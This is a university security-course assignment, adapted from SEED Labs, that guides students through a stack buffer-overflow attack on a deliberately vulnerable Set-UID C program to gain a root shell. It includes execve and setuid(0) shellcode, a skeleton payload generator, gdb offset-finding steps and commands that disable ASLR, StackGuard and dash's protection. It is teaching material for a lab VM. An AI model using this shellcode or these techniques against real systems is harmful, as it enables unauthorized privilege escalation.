Secure Systems Engineering, Spring 2024

Assignment 1

Please read this description in its entirety before starting the assignment!

Introduction

A buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary of a buffer. This vulnerability can be used by a malicious user to alter the flow control of the program, leading to the execution of malicious code. You will be given a program with a buffer-overflow vulnerability; your task is to develop a scheme to exploit the vulnerability and finally gain root privilege. In addition to the attacks, you will be guided through several protection schemes that have been implemented in the operating system to counter against buffer-overflow attacks, and gauge their efficacy. You will record your observations in a report and submit this report to Blackboard for grading.

Learning objectives

In this assignment, you will:

Helpful resources

Assignment setup

This assignment requires the use of the course VM.

Turning off countermeasures

Modern operating systems have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. Later on, we will enable them and see whether our attack can still be successful or not.

Address Space Randomization. Ubuntu and several other Linux-based systems uses address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. This feature can be disabled using the following command:

$ sudo sysctl -w kernel.randomize_va_space=0

Configuring /bin/sh. In the recent versions of Ubuntu OS, the /bin/sh symbolic link points to the /bin/dash shell. The dash program, as well as bash, has implemented a security countermeasure that prevents itself from being executed in a Set-UID process. Basically, if they detect that they are executed in a Set-UID process, they will immediately change the effective user ID to the process’s real user ID, essentially dropping the privilege.

Since our victim program is a Set-UID program, and our attack relies on running /bin/sh, the countermeasure in /bin/dash makes our attack more difficult. Therefore, we will link /bin/sh to another shell that does not have such a countermeasure (in later tasks, we will show that with a little bit more effort, the countermeasure in /bin/dash can be easily defeated). We have installed a shell program called zsh in our Ubuntu 20.04 VM. The following command can be used to link /bin/sh to zsh:

$ sudo ln -sf /bin/zsh /bin/sh

StackGuard and Non-Executable Stack. These are two additional countermeasures implemented in the system. They can be turned off during compilation. We will discuss them later when we compile the vulnerable program.

Part 1: Shellcode

The ultimate goal of buffer-overflow attacks is to inject malicious code into the target program, so the code can be executed using the target program’s privilege. Shellcode is widely used in most code-injection attacks.

The C version of shellcode

A shellcode is basically a piece of code that launches a shell. If we use C code to implement it, it will look like the following:

#include <stdio.h>
int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}

Unfortunately, we cannot just compile this code and use the binary code as our shellcode. The best way to write a shellcode is to use assembly code. In this assignment, we only provide the binary version of a shellcode, without explaining how it works (it is non-trivial).

32-bit shellcode

; Store the command on stack
xor  eax, eax
push eax
push "//sh"
push "/bin"
mov  ebx, esp     ; ebx --> "/bin//sh": execve()’s 1st argument

; Construct the argument array argv[]
push eax          ; argv[1] = 0
push ebx          ; argv[0] --> "/bin//sh"
mov  ecx, esp     ; ecx --> argv[]: execve()’s 2nd argument

; For environment variable
xor edx, edx      ; edx = 0: execve()’s 3rd argument

; Invoke execve()
xor eax,eax 
mov al, 0x0b      ; execve()’s system call number
int 0x80

The shellcode above basically invokes the execve() system call to execute /bin/sh.

We have generated the binary code from the assembly code above, and put the code in a C program called call_shellcode.c inside the shellcode/ folder.

Tasks (5 points)

Compile and run the 32-bit shellcode in call_shellcode.c, and observe what happens. The code includes two copies of shellcode: one is 32-bit and the other is 64-bit. We will only use the 32-bit shellcode in this assignment. Make sure to compile the program using the -m32 flag to use the 32-bit version will be used; without this flag, the 64-bit version will be used. The Makefile already handles this.

In your report, describe your observations. Include a screenshot of the program running.

Interlude: The vulnerable program

The vulnerable program used in this assignment is called stack.c, which is in the code folder. This program has a buffer-overflow vulnerability, and your job is to exploit this vulnerability and gain the root privilege. The code listed below has some non-essential information removed, so it is slightly different from what you get from the repository.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif

void dummy_function(char *str);

int bof(char *str)
{
    char buffer[BUF_SIZE];

    // The following statement has a buffer overflow problem 
    strcpy(buffer, str);       

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r"); 
    if (!badfile) {
       perror("Opening badfile"); exit(1);
    }

    int length = fread(str, sizeof(char), 517, badfile);
    printf("Input size: %d\n", length);
    dummy_function(str);
    fprintf(stdout, "==== Returned Properly ====\n");
    return 1;
}

The above program has a buffer overflow vulnerability. It first reads an input from a file called badfile, and then passes this input to another buffer in the function bof(). The original input can have a maximum length of 517 bytes, but the buffer in bof() is only BUF SIZE bytes long, which is less than 517. Because strcpy() does not check boundaries, buffer overflow will occur. Since this program is a root-owned Set-UID program, if a normal user can exploit this buffer overflow vulnerability, the user might be able to get a root shell. It should be noted that the program gets its input from a file called badfile. This file is under users’ control. Now, our objective is to create the contents for badfile, such that when the vulnerable program copies the contents into its buffer, a root shell can be spawned.

Compilation. To compile the above vulnerable program, do not forget to turn off the StackGuard and the non-executable stack protections using the -fno-stack-protector and -z execstack options. After the compilation, we need to make the program a root-owned Set-UID program. We can achieve this by first change the ownership of the program to root, and then change the permission to 4755 to enable the Set-UID bit. It should be noted that changing ownership must be done before turning on the Set-UID bit, because ownership change will cause the Set-UID bit to be turned off.

$ gcc -DBUF_SIZE=100 -m32 -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

The compilation and setup commands are already included in Makefile, so we just need to type make to execute those commands. The variables L1, ..., L4 are set in Makefile; they will be used during the compilation.

Part 2: Launching the attack on a 32-bit program (Level-1)

To exploit the buffer-overflow vulnerability in the target program, the most important thing to know is the distance between the buffer’s starting position and the place where the return-address is stored. We will use a debugging method to find it out. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug.

We will add the -g flag to gcc command, so debugging information is added to the binary. If you run make, the debugging version is already created. We will use gdb to debug stack-L1-dbg. We need to create a file called badfile before running the program.

$ touch badfile              <- Create an empty badfile
$ gdb stack-L1-dbg
gdb-peda$ b bof              <- Set a break point at function bof()
Breakpoint 1 at 0x124d: file stack.c, line 18. 
gdb-peda$ run                <- Start executing the program 
...
Breakpoint 1, bof (str=0xffffcf57 ...) at stack.c:18 18 {
gdb-peda$ next               <- See the note below
...
22     strcpy(buffer, str);
gdb-peda$ p $ebp             <- Get the ebp value 
$1 = (void *) 0xffffdfd8
gdb-peda$ p &buffer          <- Get the buffer’s address 
$2 = (char (*)[100]) 0xffffdfac
gdb-peda$ quit               <- Exit

Note 1. When gdb stops inside the bof() function, it stops before the ebp register is set to point to the current stack frame, so if we print out the value of ebp here, we will get the caller’s ebp value. We need to use next to execute a few instructions and stop after the ebp register is modified to point to the stack frame of the bof() function. The SEED book is based on Ubuntu 16.04, and gdb’s behavior is slightly different, so the book does not have the next step.

Note 2. It should be noted that the frame pointer value obtained from gdbis different from that during the actual execution (without using gdb). This is because gdb has pushed some environment data into the stack before running the debugged program. When the program runs directly without using gdb, the stack does not have those data, so the actual frame pointer value will be larger. You should keep this in mind when constructing your payload.

Launching attacks

To exploit the buffer-overflow vulnerability in the target program, we need to prepare a payload, and save it inside badfile. We will use a Python program to do that. We provide a skeleton program called exploit.py, which is included in the repository. The code is incomplete, and students need to replace some of the essential values in the code.

#!/usr/bin/python3
import sys

# Replace the content with the actual shellcode
shellcode= (
  "\x90\x90\x90\x90"  
  "\x90\x90\x90\x90"  
).encode('latin-1')

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517)) 

##################################################################
# Put the shellcode somewhere in the payload
start = 0               # Change this number 
content[start:start + len(shellcode)] = shellcode

# Decide the return address value 
# and put it somewhere in the payload
ret    = 0x00           # Change this number 
offset = 0              # Change this number 

L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') 
##################################################################

# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)

Run this program to generate the contents for badfile. Then run the vulnerable program stack.

$ ./exploit.py     <- create the badfile
$ ./stack-L1       <- launch the attack by running the vulnerable program

Tasks (35 points)

Finish the above program to execute the buffer overflow attack. If your exploit is implemented correctly, you should be able to get a root shell:

$ ./exploit.py 
$ ./stack-L1
#                  <- Bingo! You've got a root shell!

In your report, in addition to providing screenshots to demonstrate your investigation and attack, you also need to explain how the values used in your exploit.py are decided. These values are the most important part of the attack, so a detailed explanation can help the instructor grade your report. Only demonstrating a successful attack without explaining why the attack works will not receive many points.

Part 3: Launching the attack without knowing the buffer size (Level-2)

Part 3 is no longer a part of the assignment. You can skip this part, and move straight to Part 4.

Part 4: Defeating dash’s countermeasure

The dash shell in Ubuntu drops privileges when it detects that the effective UID does not equal to the real UID (which is the case in a Set-UID program). This is achieved by changing the effective UID back to the real UID, essentially, dropping the privilege. In the previous tasks, we let /bin/sh points to another shell called zsh, which does not have such a countermeasure. In this task, we will change it back, and see how we can defeat the countermeasure. Please do the following, so /bin/sh points back to /bin/dash.

$ sudo ln -sf /bin/dash /bin/sh

To defeat the countermeasure in buffer-overflow attacks, all we need to do is to change the real UID, so it equals the effective UID. When a root-owned Set-UID program runs, the effective UID is zero, so before we invoke the shell program, we just need to change the real UID to zero. We can achieve this by invoking setuid(0) before executing execve() in the shellcode.

The following assembly code shows how to invoke setuid(0). The binary code is already put inside call_shellcode.c. You just need to add it to the beginning of the shellcode.

; Invoke setuid(0): 32-bit
xor ebx, ebx      ; ebx = 0: setuid()’s argument
xor eax, eax
mov  al, 0xd5     ; setuid()’s system call number
int 0x80

; Invoke setuid(0): 64-bit
xor rdi, rdi      ; rdi = 0: setuid()’s argument
xor rax, rax
mov  al, 0x69     ; setuid()’s system call number
syscall

Tasks (10 points)

  1. Compile call_shellcode.c into root-owned binary (by typing “make setuid”). Run the shellcode a32.out with or without the setuid(0) system call. Please describe and explain your observations.
  2. Now, using the updated shellcode, we can attempt the attack again on the vulnerable program, and this time, with the shell’s countermeasure turned on. Repeat your attack on Level 1, and see whether you can get the root shell. After getting the root shell, please run the following command to prove that the countermeasure is turned on. Include a screenshot in your report.
# ls -l /bin/sh /bin/zsh /bin/dash

Part 5: Defeating address randomization

On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 219 = 524, 288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach. In this part, we use such an approach to defeat the address randomization countermeasure on our 32-bit VM.

Tasks (10 points)

  1. First, we turn on the Ubuntu’s address randomization using the following command. Then we run the same attack against stack-L1. Please describe and explain your observation in your report.
$ sudo /sbin/sysctl -w kernel.randomize_va_space=2
  1. We then use the brute-force approach to attack the vulnerable program repeatedly, hoping that the address we put in the badfile can eventually be correct. We will only try this on stack-L1, which is a 32-bit program. You can use the following shell script to run the vulnerable program in an infinite loop. If your attack succeeds, the script will stop; otherwise, it will keep running. Please be patient, as this may take a few minutes, but if you are very unlucky, it may take longer. Please describe your observation in your report.

Part 6: StackGuard protection

Many compilers, such as gcc, implements a security mechanism called StackGuard to prevent buffer overflows. In the presence of this protection, buffer overflow attacks will not work. In the previous parts, we disabled the StackGuard protection mechanism when compiling the programs. In this part, we will turn it on and see what will happen.

Tasks (5 points)

First, repeat the Level-1 attack with the StackGuard off, and make sure that the attack is still successful. Remember to turn off the address randomization, because you have turned it on in the previous task. Then, we turn on the StackGuard protection by recompiling the vulnerable stack.c program without the -fno-stack-protector flag. In gcc version 4.3.3 and above, StackGuard is enabled by default. Launch the attack; report and explain your observations.

Part 7: Non-executable stack protection

Operating systems used to allow executable stacks, but this has now changed: In Ubuntu, the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. Kernel or dynamic linker uses this marking to decide whether to make the stack of this running program executable or non-executable. This marking is done automatically by gcc, which by default makes stack non-executable. We can specifically make it non-executable using the “-z noexecstack” flag in the compilation. In our previous tasks, we used “-z execstack” to make stacks executable.

Aside. It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-libc attack is an example.

Tasks (5 points)

In this task, we will make the stack non-executable. We will do this experiment in the shellcode folder. The call_shellcode program puts a copy of shellcode on the stack, and then executes the code from the stack. Please recompile call_shellcode.c into a32.out, without the “-z execstack” option. Run them, describe and explain your observations.

What to turn in

Submit the following to Blackboard before the assignment due date:

Although this is a group assignment, each member of the group needs to submit their own copy to Blackboard.

Attribution

Original SEED Labs version Copyright © 2006-2020 Wenliang Du. Modifications by Tushar Jois for Secure Systems Engineering, Spring 2024.

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. If you remix, transform, or build upon the material, this copyright notice must be left intact, or reproduced in a way that is reasonable to the medium in which the work is being re-published.